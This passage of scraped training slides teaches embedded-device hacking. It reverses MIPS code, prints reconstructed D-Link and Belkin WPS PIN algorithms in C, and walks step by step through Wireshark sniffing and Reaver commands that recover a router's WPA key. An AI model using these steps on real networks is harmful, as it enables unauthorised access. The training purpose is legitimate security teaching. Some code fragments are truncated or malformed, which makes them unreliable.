char * data =lockAndGetInfo_log->interesting_data_element
……………………………………
sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
![Page 96: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/96.jpg)
Answer: MAC address Unique across all networking devices
12 bytes
Often used in combination with other values to seed various algorithms
Hunt for the pin generation algorithm
c. Figure out what type of data could “%c%c:..:%c%c” represent
char buffer [….];
char * data =lockAndGetInfo_log->interesting_data_element
……………………………………
sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
![Page 97: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/97.jpg)
4) Reverse algorithm segment into C code
(Next Slide)
Extraction and Analysis (Steps)
![Page 98: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/98.jpg)
As we will see, reversing assembly into C can be a tedious and arduous process
We will reverse the following code segment:
Reverse algorithm segment into C code
a. Reversing an example snippet of code
![Page 99: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/99.jpg)
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly Psuedo-C code
v0 = 0x38E38E39
MIPS Instruction ‘li’:
Loads a constant value into a register
Value will be used for future arithmetic operation
![Page 100: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/100.jpg)
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly Psuedo-C code
v0 = 0x38E38E39
[hi,lo] = v0*a3
MIPS Instruction ‘multiu’:
Multiply two 32-bit values (e.g. a3 & v0)
Registers `hi’ & ‘lo’ store the resulting 64-bit product
hi (upper 32-bits) lo (lower 32-bits)
64-bit product
![Page 101: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/101.jpg)
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly Psuedo-C code
v0 = 0x38E38E39
[hi,lo] = v0*a3
v0 = (v0*a3)>>32; right shift 32
MIPS Instruction ‘mfhi’:
Move value in ‘hi’ register to specified register (e.g. v0)
This is equivalent to right shifting the 64-bit product of v0 & a3 by 32-bits
![Page 102: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/102.jpg)
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly Psuedo-C code
v0 = 0x38E38E39
[hi,lo] = v0*a3
v0 = (v0*a3)>>32; right shift 32
v0 = v0 >> 1;
= ((a3 * 0x38E38E39) >>32) >> 1
MIPS Instruction ‘srl’:
Shift right logical
Logical means that the bit that replaces the most upper bits as the shift occurs is the value ‘0’
Lower bits that get shifted out are discarded
![Page 103: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/103.jpg)
Observations
The net result of the assembly instructions is a complex looking expression
It turns out that this can be simplified quite a bit
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
![Page 104: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/104.jpg)
Observations
Logical shifts have an associative property
e.g. (v1>> 32) >> 1 == v1 >> 33
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
![Page 105: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/105.jpg)
Observations
Right shifting a number by 1 has the effect of dividing that number by 2.
Therefore right shifting a number by 33 has the effect of
dividing that number by 2^33 = 8589934592
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592
![Page 106: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/106.jpg)
Observations
(954437177)10 = 0x38E38E39
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592
= (a3)(954437177/8589934592)
![Page 107: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/107.jpg)
Observations
1/9 ~=(954437177)/8589934592
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592
= (a3)(954437177/8589934592)
= (a3)(1/9)
![Page 108: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/108.jpg)
Observations As the above example illustrates, the disassembly performs operations such
as shifts to do multiplication and division
What looks complex may be able to be decompiled into something much simpler
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
v0 = ($a3)/9
Disassembly C code
![Page 109: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/109.jpg)
Luckily someone else (Craig) did all the grunt work in decompiling the disassembly for us
But we’ve seen how the general process for reversing works, so in theory we could do it
On the next slides, we’ll show the complete C implementation of the get_default_pin algoritm
Reverse algorithm segment into C code
b. Reversing the entire algorithm
![Page 110: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/110.jpg)
dd
/* * The largest possible remainder for any value divided by 10,000,000 * is 9,999,999 (7 digits). The smallest possible remainder is, * obviously, 0. */
pin = pin % 10000000; /* The pin needs to be at least 7 digits long */ if(pin < 1000000) { /* * The largest possible remainder for any value divided by 9 is * 8; hence this adds at most 9,000,000 to the pin value, and at * least 1,000,000. This guarantees that the pin will be 7 digits * long, and also means that it won't start with a 0. */
pin += ((pin % 9) * 1000000) + 1000000; } /* * The final 8 digit pin is the 7 digit value just computed, plus a * checksum digit. Note that in the disassembly, the wps_pin_checksum * function is inlined (it's just the standard WPS checksum implementation). */
pin = ((pin * 10) + wps_pin_checksum(pin)); sprintf(buf, "%08d", pin); return pin; }
get_default_pin (Dlink router)
unsigned int generate_default_pin(char *buf) { char *mac; char mac_address[32] = { 0 }; unsigned int oui, nic, pin;
/* Get a pointer to the WAN MAC address */ mac = lockAndGetInfo_log()->wan_mac_address;
/* * Create a local, NULL-terminated copy of the WAN MAC (simplified from * the original code's sprintf/memmove loop). */ sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0], mac[1], mac[2], …… mac[11] sscanf(mac_address, "%06X%06X", &oui, &nic); /* Do some XOR munging of the NIC. */ pin = (nic ^ 0x55AA55); pin = pin ^ (((pin & 0x0F) << 4) + ((pin & 0x0F) << 8) + ((pin & 0x0F) << 12) + ((pin & 0x0F) << 16) + ((pin & 0x0F) << 20));
![Page 111: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/111.jpg)
We could follow a similar process to reverse the Belkin Pin algorithm
Yet again, Craig has spared us the trouble
On the next slide is the reversed C implementation of the Belkin algorithm
Reverse algorithm segment into C code
c. Reversing the Belkin Pin Generation Algorithm
![Page 112: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/112.jpg)
k1 = (sn[SN_DIGIT_2] + sn[SN_DIGIT_3] + nic[NIC_NIBBLE_0] + nic[NIC_NIBBLE_1]) % 16; k2 = (sn[SN_DIGIT_0] + sn[SN_DIGIT_1] + nic[NIC_NIBBLE_3] + nic[NIC_NIBBLE_2]) % 16; pin = k1 ^ sn[SN_DIGIT_1]; t1 = k1 ^ sn[SN_DIGIT_0]; t2 = k2 ^ nic[NIC_NIBBLE_1]; p1 = nic[NIC_NIBBLE_0] ^ sn[SN_DIGIT_1] ^ t1; p2 = k2 ^ nic[NIC_NIBBLE_0] ^ t2; p3 = k1 ^ sn[SN_DIGIT_2] ^ k2 ^ nic[NIC_NIBBLE_2]; k1 = k1 ^ k2; pin = (pin ^ k1) * 16; pin = (pin + t1) * 16; pin = (pin + p1) * 16; pin = (pin + t2) * 16; pin = (pin + p2) * 16; pin = (pin + k1) * 16; pin += p3; pin = (pin % 10000000) - (((pin % 10000000) / 10000000) * k1) return (pin * 10) + wps_checksum(pin); }
get_default_pin (Belkin router) /* Munges the MAC and serial numbers to create a WPS pin */ int pingen(char *mac, char *serial) { #define NIC_NIBBLE_0 0 #define NIC_NIBBLE_1 1 #define NIC_NIBBLE_2 2 #define NIC_NIBBLE_3 3 #define SN_DIGIT_0 0 #define SN_DIGIT_1 1 #define SN_DIGIT_2 2 #define SN_DIGIT_3 3 int sn[4], nic[4], mac_len, serial_len; int k1, k2, pin p1, p2, p3 t1, t2; mac_len = strlen(mac); serial_len = strlen(serial); /* Get the four least significant digits of the serial number */ sn[SN_DIGIT_0] = char2int(serial[serial_len-1]); sn[SN_DIGIT_1] = char2int(serial[serial_len-2]); sn[SN_DIGIT_2] = char2int(serial[serial_len-3]); sn[SN_DIGIT_3] = char2int(serial[serial_len-4]); /* Get the four least significant nibbles of the MAC address */ nic[NIC_NIBBLE_0] = char2int(mac[mac_len-1]); nic[NIC_NIBBLE_1] = char2int(mac[mac_len-2]); nic[NIC_NIBBLE_2] = char2int(mac[mac_len-3]); nic[NIC_NIBBLE_3] = char2int(mac[mac_len-4]);
![Page 113: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/113.jpg)
Lab 2: Q&A
Why are weaknesses in implementation of a security design not discovered before product released? Companies care more about time-to-market
Subscribe to the notion of security through obscurity
How long does the reverse engineering process take? Depends on the device and the skills of the personnel
Charlie and Chris (Chrysler Jeep hack) said it took them over 3.5 months and they are pretty experienced
![Page 114: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/114.jpg)
Lab 2: Q&A
Is the reverse process always this tedious? In general…yes, if not more so.
What things can make reversing harder? Stripped binaries (e.g. no symbols)
Anti-debugging techniques
Code obfuscation
Writing original code in C++
What is an ELF (Executable and Linkable Format)? Standard file format on Unix-like systems
![Page 115: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/115.jpg)
Lab 2: Q&A
Why is MIPS still popular in embedded devices? Licensing costs for MIPS is cheaper than ARM
Why couldn’t we decompile using IDA Pro? IDA only supports ARM and x86/64
No reliable decompilers for MIPS in general.
![Page 116: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/116.jpg)
Additional Resources Reversing D-Link’s WPS Pin Algorithm:
http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/
Lab 2: Reversing with IDA Pro
![Page 117: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/117.jpg)
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark
& Reaver
Session I: Outline
![Page 118: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/118.jpg)
Lab 3: Obtaining initial access
Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 3
![Page 119: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/119.jpg)
Description In this lab, we will explore how to use our knowledge of the pin generation
algorithm to derive the WPA Key
Specifically, we will first need to acquire relevant input information into the algorithm by using Wireshark, and then run the algorithm to compute the WPS PIN
Then we’ll need to use Reaver to derive the WPA key from the WPS PIN
Lab 3: Obtaining initial access
![Page 120: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/120.jpg)
Steps for Obtaining initial access
1. Acquire serial and wlan mac w/ Wireshark
2. Compile & execute wps pin generation algorithm
3. Run Reaver to obtain the WPA key
4. Connect to the router utilizing obtained WPA key
Lab 3: Obtaining initial access
![Page 121: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/121.jpg)
1) Acquire Serial and WLAN MAC with
Wireshark
(Next Slides)
Lab 3: Obtaining initial access
![Page 122: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/122.jpg)
We’ll need a wifi adapter that supports monitor mode
Monitor mode enables monitoring of all traffic received
Normally, the wifi adapter will filter out traffic not destined for it
An example wifi adapter that supports monitor mode is the TP-LINK TL-WN722N
(pictured above); cost about $12
Acquiring serial and wlan information
a. Attach Wifi adapter (monitor mode support) to PC
![Page 123: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/123.jpg)
b. Connect wifi adapter to guest Kali-Linux VM
Acquiring serial and wlan information
Click this
![Page 124: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/124.jpg)
b. Connect wifi adapter to guest Kali-Linux VM
Acquiring serial and wlan information
Click This
![Page 125: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/125.jpg)
c. Get the name of the wireless interface (e.g. wlanx),were x is 0-9
Acquiring serial and wlan information
$ sudo iwconfig
Wireless Interface Name
![Page 126: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/126.jpg)
d. Bring the wireless interface down so we can configure it
Acquiring serial and wlan information
$ sudo ifconfig wlanx down
![Page 127: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/127.jpg)
e. Change the wifi mode to monitor
Acquiring serial and wlan information
$ sudo iwconfig wlan0 mode monitor
![Page 128: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/128.jpg)
f. Set the channel of wireless interface to channel y, where y in 1-12
Acquiring serial and wlan information
$ sudo iwconfig wlan0 channel %y%
![Page 129: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/129.jpg)
g. Bring the wireless interface back up
Acquiring serial and wlan information
$ sudo ifconfig wlan0 up
![Page 130: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/130.jpg)
h. Launch Wireshark
Acquiring serial and wlan information
$ sudo wireshark
![Page 131: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/131.jpg)
h. Click on wireless interface wlanx
Acquiring serial and wlan information
Click this
![Page 132: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/132.jpg)
i. Click Start
Acquiring serial and wlan information
Click this
![Page 133: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/133.jpg)
i. Click Start
Acquiring serial and wlan information
![Page 134: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/134.jpg)
i. (Continued)
Acquiring serial and wlan information
![Page 135: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/135.jpg)
j. Wait approximately 1-3 minute(s) as Wireshark captures packets
Acquiring serial and wlan information
![Page 136: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/136.jpg)
k. Stop the capture
Acquiring serial and wlan information
Click to stop Capture
![Page 137: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/137.jpg)
l. Find a probe response message from Belkin_xx:xx:xx and click on it
Acquiring serial and wlan information
![Page 138: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/138.jpg)
m. Click on “IEEE 802.11 wireless LAN management” to expand the selection
Acquiring serial and wlan information
Click to expand
![Page 139: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/139.jpg)
n. (After click)
Acquiring serial and wlan information
![Page 140: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/140.jpg)
o. Click on “Tagged parameters” to expand the selection
Acquiring serial and wlan information
After Click
![Page 141: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/141.jpg)
p. Click on “Vendor Specific” to expand the selection
Acquiring serial and wlan information
After Click
![Page 142: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/142.jpg)
q. Locate and record the Serial Number
Acquiring serial and wlan information
Serial Number
![Page 143: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/143.jpg)
r. Locate and Record wlan MAC address of the Belkin router
Acquiring serial and wlan information
MAC Address
![Page 144: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/144.jpg)
2. Compile & execute wps pin
generation algorithm
(Next Slides)
Lab 3: Obtaining initial access
![Page 145: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/145.jpg)
a. Download pingen algorithm source from here and save to home dir
Compile & Execute WPS pingen Algorithm
![Page 146: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/146.jpg)
b. Compile pingen.c
Compile & Execute WPS pingen Algorithm
$ sudo gcc -Wall pingen.c -o pingen
![Page 147: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/147.jpg)
c. Executing the pingen binary to see usage
Compile & Execute WPS pingen Algorithm
$ ./pingen
![Page 148: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/148.jpg)
d. Pass in appropriate parameters and execute pingen to get pin
Compile & Execute WPS pingen Algorithm
$ ./pingen xxxx xxxx
Default Pin
![Page 149: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/149.jpg)
e. The Results
Compile & Execute WPS pingen Algorithm
The Pin
![Page 150: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/150.jpg)
Default Pin
e. The Results
Compile & Execute WPS pingen Algorithm
The Pin
![Page 151: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/151.jpg)
3. Run Reaver to obtain WPA Key
(Next Slides)
Lab 3: Obtaining initial access
![Page 152: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/152.jpg)
a. Executing Reaver with appropriate arguments
Run Reaver to Obtain WPA Key
reaver -i (monitor interface) -b (BSSID) -c (channel) ---pin=(8 digit pin) –T 5 -vv
![Page 153: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/153.jpg)
b. Wait for the Results (can take up to 30 seconds)
Run Reaver to Obtain WPA Key
WPA KEY
![Page 154: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/154.jpg)
4. Connect to the router by utilizing
the obtained WPA key
(Next Slides)
Lab 3: Obtaining initial access
![Page 155: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/155.jpg)
a. Bring the wireless interface down so we can configure it
Connect to router with WPA key
$ sudo ifconfig wlanx down
![Page 156: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/156.jpg)
b. Change the wifi mode to managed
Connect to router with WPA key
$ sudo iwconfig wlan0 mode managed
![Page 157: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/157.jpg)
c. Bring the wireless interface back up
Connect to router with WPA key
$ sudo ifconfig wlan0 up
![Page 158: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/158.jpg)
c. Wait about a minute or so for the interface to be brought up
Connect to router with WPA key
![Page 159: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/159.jpg)
d. Click the networking icon
Connect to router with WPA key
Click this icon
![Page 160: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/160.jpg)
e. Select the Appropriate Access Point
Connect to router with WPA key
Click on the appropriate AP
![Page 161: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/161.jpg)
f. Enter the WPA key and connect
Connect to router with WPA key
Enter WPA Key
![Page 162: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/162.jpg)
g. Wait while connection occurs
Connect to router with WPA key
Connecting…
![Page 163: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/163.jpg)
h. Connection is established
Connect to router with WPA key
Success!!
![Page 164: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/164.jpg)
h. Connect to web management server (Obtained Initial Access!!)
Connect to router with WPA key
![Page 165: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/165.jpg)
i. Log into web management interface (Preview of next session)
Connect to router with WPA key
We’ll figure out how to gain admin access in Session II
![Page 166: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/166.jpg)
Lab 3: Q&A
What’s the difference between monitor mode and promiscuous mode? Promiscuous mode allows packets to be sniffed only on the AP the wifi
adapter is currently connected to
Monitor mode allows all packets on a particular channel to be sniffed if packets are in listening range
Are there any other interesting wifi modes? Master mode, which allows the wifi adapter to behave as an access point
The TP Link adapter also supports this mode
![Page 167: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/167.jpg)
References
[1] WPS Vulnerability, University of Alabama, Huntsville
![Page 168: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/168.jpg)
Recap
Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
![Page 169: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/169.jpg)
Recap
Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 1
![Page 170: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/170.jpg)
Recap
Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 2
![Page 171: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/171.jpg)
Recap
Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 3
![Page 172: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/172.jpg)
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
174
Recap
Pwned
Session I
![Page 173: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/173.jpg)
Conclusion
In this session, we were able to obtain initial remote access to the target device
The next step is to elevate our privileges on the target to that of an adminsitrator.
This device uses client side authentication for admin privileges, which we will exploit in Session II
Session III will be focused on utilizing admin privileges from Session II to compromise a Windows 7 device connected to the Belkin router